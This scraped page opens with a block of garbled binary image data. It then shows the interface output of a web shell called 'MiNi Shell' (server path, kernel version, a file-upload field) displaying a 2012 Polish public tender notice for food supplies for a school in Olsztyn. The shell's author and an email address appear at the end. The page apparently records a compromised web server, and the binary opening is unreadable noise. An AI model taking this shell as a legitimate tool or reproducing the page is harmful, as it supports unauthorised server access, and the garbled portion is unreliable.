JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120110/8507-N-2012.html

<p class="kh_header"><b>Olsztyn: dostawy różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 8507 - 2012; data zamieszczenia: 10.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Elektronicznych i Telekomunikacyjnych , ul. Bałtycka 37A, 10-144 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5275191, faks 089 5226970.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zset.olsztyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 15800000-6 różne produkty spożywcze  i 15600000-4 produkty z przemiału ziarna (część I)
15300000-1 owoce warzywa i podobne produkty (część II)
15331170-9 owoce i warzywa przetworzone  MROŻONKI (część III)
OPIS PRZEDMIOTU ZAMÓWIENIA 					
RÓŻNE PRODUKTY SPOZYWCZE 			CPV 15800000-6		
OWOCE, WARZYWA I PODOBNE PRODUKTY			CPV 15300000-1		
PRODUKTY Z PRZEMIAŁU ZIARNA			CPV15600000-4		
OWOCE I WARZYWA PRZETWORZONE  Mrożonki CPV 15331170-9					
	część I				
15800000-6 różne produkty spożywcze 					
15600000-4 produkty z przemiału ziarna 					
LP	NR CPV	NAZWA PRODUKTU	DODATKOWY OPIS	JM	ILOŚĆ
1.	15842300-5	WAFEL Z KREMEM KAKAOWYM BEZ CZEKOLADY	Min.28g, 	Szt.	1950
2.	15842300-5	WAFEL Z KREMEM KAKAOWYM W CZEKOLADZIE	Min. 39g, 	Szt.	3000
3.	15842100-3	CZEKOLADA PEŁNOMLECZNA	100g	Szt.	800
4.	15842300-5	WAFELKI B/CZ PRZEKŁADANE KREMEM	Kakaowe,  orzechowe, śmietankowo-kakaowe,opakowanie jednostkowe 80-90g  	Szt.	2000
5.	15842220-0	BATON Z NADZIENIEM W MLECZNEJ CZEKOLADZIE	35-45g,	Szt.	5200
6.	15842220-0	BATON Z NADZIENIEM W MLECZNEJ CZEKOLADZIE	46-55g,	szt	3500
7.	15842300-5	PIERNICZKI W CZEKOLADZIE Z MARMOLADĄ	opakowanie jednostkowe 140-160g, 	Szt.	500
8.	15821200-1	HERBATNIKI	50g	Szt.	3000
9.	15842300-5	mieszanka cukierków w polewie czekoladowej	250-300g	szt	300
10.	15332310-0	orzechy ziemne	solone, 150-200g	szt	270
11.	15842300-5	galaretki w cukrze	opakowanie jednostkowe 90-110g	szt	500
12.	15842300-5	biszkopty z galaretką i polewą czekoladową	typu delicje 160-180g	szt	520
13.	15332412-5	rodzynki w czekoladzie	opak. 90-120 g	szt	270
14.	15842200-4	krem czekoladowo-orzechowy	op 300-500g	KG	180
15.	15841000-5	KAKAO	200g ciemne 	Szt.	200
16.	15614100-6	ryż długoziarnisty	paraboliczny	KG	300
17.	15613000-8	kasza kukurydziana	op. 0,4-1 kg	KG	40
18.	15613000-8	kasza gryczana	op.0,5-1 kg	KG	80
19.	15611000-4	RYŻ ŁUSKANY	op. 1 kg	KG	150
20.	15612100-2	MĄKA PSZENNA	TYP 450, opakowanie jednostkowe 1kg	KG	1100
21.	15612300-4	MĄKA ZIEMNIACZANA	opakowanie jednostkowe 0,5-1kg	KG	80
22.	15613000-8	KASZA JĘCZMIENNA	ŚREDNIA op. 0,5-1kg	KG	180
23.	15613311-1	PŁATKI KUKURUDZIANE	SŁODKIE op. 0,5-2 kg	kg	140
24.	15613311-1	PŁATKI KUKURYDZIANE	OP 0,5-2kg	KG	150
25.	15613380-5	PŁATKI OWSIANE	0,4-1kg	kg	40
26.	15613000-8	PŁATKI JĘCZMIENNE	0,4-1kg	kg	50
27.	15614000-5	PŁATKI RYŻOWE	0,4 - 1kg	kg	40
28.	15831200-4	CUKIER BIAŁY	opakowanie 1 kg	Kg	3000
29.	15862000-8	KAWA INKA	150g	Szt.	80
30.	15872400-5	SÓL	warzona	Kg	480
31.	15871273-8	MAJONEZ	typu Kętrzyński, słoik 0,9l	Szt.	300
32.	15871273-8	MAJONEZ	typu Kętrzyński opakowanie 5kg	Szt.	30
33.	15871250-1	MUSZTARDA	op.1 kg	Kg	80
34.	15831600-8	MIÓD	Pszczeli nektarowy,25g	Szt.	5000
35.	15863000-5	HERBATA	Granulowana 100g	Szt.	1300
36.	15893200-6	KISIEL	Owocowy, różne smaki, op.0,5-1kg	kg	80
37.	15893200-6	BUDYŃ	Różne smaki, op. 0,5-1 kg	kg	20
38.	15893300-7	ŻELATYNA SPOŻYWCZA	op. 0,5-1 kg	kg	4
39.	15893200-6	GALARETKA	Różne smaki, op. 0,5-1 kg	kg	100
40.	15893200-6	CUKIER WANILIOWY	op. Jednostkowe 16-32 g	kg	9,6
41.	15872300-4	LIŚĆ LAUROWY	op.jedn. 20-50g	kg	9
42.	15872300-4	ZIELE ANGIELSKIE	op.jedn.100-300g	kg	2
43.	15872300-4	koperek suszony	opakowanie 100-250g	kg	2
44.	15872300-4	natka pietruszki suszona	opakowanie 100-250g	KG	2,5
45.	15831200-4	CUKIER PUDER	op. 0,5-1 kg	kg	10
46.	15872300-4	MAJERANEK	20-100g	kg	9
47.	15872200-3	CZOSNEK GRANULOWANY	op. 100-500g	kg	10
48.	15872100-2	PIEPRZ MIELONY	op. 100-500g	kg	10
49.	15872300-4	PAPRYKA MIELONA OSTRA	op. 100-500g	kg	4
50.	15872300-4	PAPRYKA MIELONA SŁODKA	op. 100-500g	kg	6
51.	15893100-5	KWASEK CYTRYNOWY	op. 20g -100g	kg	12
52.	15871270-7	PRZYPRAWA DO POTRAW	Typu Warzywko,op. 0,5- 1kg	kg	150
53.	15851100-9	MAKARON GWIAZDKI	 100% pszenicy durum, op. 0,5-3 kg	kg	100
54.	15851100-9	MAKARON ŚWIDERKI	 100% pszenicy durum, op. 0,5-3 kg	kg	200
55.	15851100-9	MAKARON NITKI	 100% pszenicy durum, op. 0,5-3 kg	kg	80
56.	15851100-9	MAKARON ZACIERKA	100% pszenicy durum, op.0,5-3 kg	kg	100
57.	15851100-9	MAKARON SPAGETTI	100% pszenicy durum, op.0,5-3 kg	kg	240
58.	15411200-4	OLEJ SPOŻYWCZY	opakowanie po 0,9-1,1 litra	Litr	250
59.	15871270-7	przyprawa do drobiu	 w proszku, op. 0,5-1 kg	KG	20
60.	15870000-7	sos sałatkowy	 mix smaków,w proszku, op. 0,5-1 kg	KG	20
61.	15893100-5	sos do spagetti	 w proszku, op. 0,5-1,5 kg	KG	50
62.	15431000-8	tłuszcz do pieca konwekcyjnego	opak. 1-5 litrów	Litr	35
63.	15891410-7	ZUPA ŻUREK	w proszku, op. 0,5-1 kg	kg	24
	opis zawiera  63 pozycje				
					
	część II				
CPV 15300000-1owoce, warzywa i podobne produkty					
LP	NR CPV	NAZWA PRODUKTU	DODATKOWY OPIS	JM	ILOŚĆ
1.	15321100-5	NAPÓJ POMARAŃCZOWY	0,2 l,  zaw. owoców min.20%,	Szt.	1000
2.	153221600-0	NAPÓJ JABŁKOWY	0,2 l, zaw. Owoców min.20%, 	Szt.	1000
3.	15321700-1	MIESZANKA SOKÓW NIESKONCENTROWANYCH	Soki marchwiowo-owocowe 0,3 l , zaw. Min. 35% składnika owocowego, 	Szt.	300
4.	15331464-7	FASOLA CZERWONA KONSERW.	op. 0,4-3 kg	kg	52
5.	15331462-3	GROSZEK KONSERW.	400g	Szt.	300
6.	15331500-2	PAPRYKA KONSERWOWA	słoik 500-1000g	kg	77
7.	15332100-5	ananas konserwowy	kostka op. 500-700g	kg	35
8.	15331400-1	szczaw krojony	op 700-900g	kg	67
9.	15871230-5	KETCHUP - PIKANTNY SOS POMIDOROWY	zaw.minimum 30% koncentratu pomidorowego,op. 1-5 kg	kg	500
10.	15331427-6	KONCENTRAT POMIDOROWY	opakowanie 500-1000g  30%  bez konserwantów,	kg	250
11.	15332230-5	MARMOLADA WIELOOWOCOWA TWARDA	opakowanie 500-1200g	kg	30
12.	15332290-3	DŻEM NISKOSŁODZONY	opakowanie 1-6,5kg, truskawka, morela, wiśnia, czarna porzeczka	kg	400
13.	15331500-2	OGÓRKI KONSERWOWE	słoik 0,9 litra	Szt.	200
14.	15331470-2	KUKURYDZA KONSERWOWA	Słodka 400g	Szt.	250
15.	15332410-1	SUSZ OWOCOWY WIGILIJNY	mieszanka owoców suszonych	Kg	1
16.	15331110-1	CHRZAN TARTY	op.200-500g	kg	17
17.	15331110-1	ĆWIKŁA Z CHRZANEM	op. 200-500 g	kg	17
18.	15332419-4	RODZYNKI		Kg	1
19.	15332410-1	MAK NIEBIESKI		Kg	2
20.	15331110-1	KONCENTRAT BARSZCZU CZERWONEGO	200g	Szt.	60
21.	15332290-3	dżem owocowy	opakowanie 280g, truskawka, wiśnia, czarna porzeczka, morela	Szt.	250
22.	15332290-3	powidła śliwkowe	opak.240g	Szt.	170
23.	15322000-1	sok wielowarzywny	op.1 l	l	200
24.	15322000-1	sok marchwiowy	op.1l	l	300
25.	15321700-1	sok marchew-jabłko-brzoskwinia, marchew-jabłko-malina, marchew-jabłko-pomarańcza	op.1l	l	300
26.	15322100-2	sok pomidorowy	op. 1l	l	250
27.	15981000-8	woda mineralna	niegazowana opak. O,5l	l	50
	opis zawiera 27 pozycji				
					
	CZĘŚĆ III				
owoce i warzywa przetworzone  MROŻONKI CPV 15331170-9					
LP	NR CPV	NAZWA PRODUKTU	DODATKOWY OPIS	JM	ILOŚĆ
1.	15332100-5	WIŚNIE MROŻONE	Bez pestek,opak.1-2,5kg	Kg	30
2.	15332100-5	TRUSKAWKA MROŻONA	opak.1-2,5kg	Kg	60
3.	15332100-5	MIESZANKA OWOCOWA MROŻONA	Kompotowa  6 skł., opak.1-2,5 kg	Kg	1000
4.	15331170-9	MIESZANKA WARZYWNA MROŻONA	7 składnikowa, opak.1-2,5kg	Kg	150
5.	15331170-9	KALAFIOR MROŻONY	opak.1-2,5kg	Kg	200
6.	15331170-9	brokuły mrożone	opak.1-2,5kg	kg	20
7.	15331170-9	papryka mrożona	opak.1-2,5kg	Kg	30
8.	15331170-9	fasolka szparagowa mrożona	opak.1-2,5kg	kg	200
9.	15331170-9	włoszczyzna mrożona	opak.1-2,5kg	kg	50
10	15311100-2	frytki mrożone	podsmażane, opak.1-2,5kg	kg	900
	opis zawiera 10 pozycji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1, 15.30.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału, zawartych w ust. od 1.1 - 1.3, nastąpi na podstawie wymaganych i załączonych przez Wykonawcę do oferty oświadczeń, wymienionych w Rozdziale IX siwz. Z  oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału, zawartych w ust. od 1.1 - 1.3, nastąpi na podstawie wymaganych i załączonych przez Wykonawcę do oferty oświadczeń, wymienionych w Rozdziale IX siwz. Z  oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału, zawartych w ust. od 1.1 - 1.3, nastąpi na podstawie wymaganych i załączonych przez Wykonawcę do oferty oświadczeń, wymienionych w Rozdziale IX siwz. Z  oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2. Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału, zawartych w ust. od 1.1 - 1.3, nastąpi na podstawie wymaganych i załączonych przez Wykonawcę do oferty oświadczeń, wymienionych w Rozdziale IX siwz. Z  oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowaniu po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zset.olsztyn.pl  (zakładka BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Olsztyn, u. Bałtycka 37A, administracja Bursy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2012 godzina 10:00, miejsce: w siedzibie zamawiającego w sekretariacie pok.20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com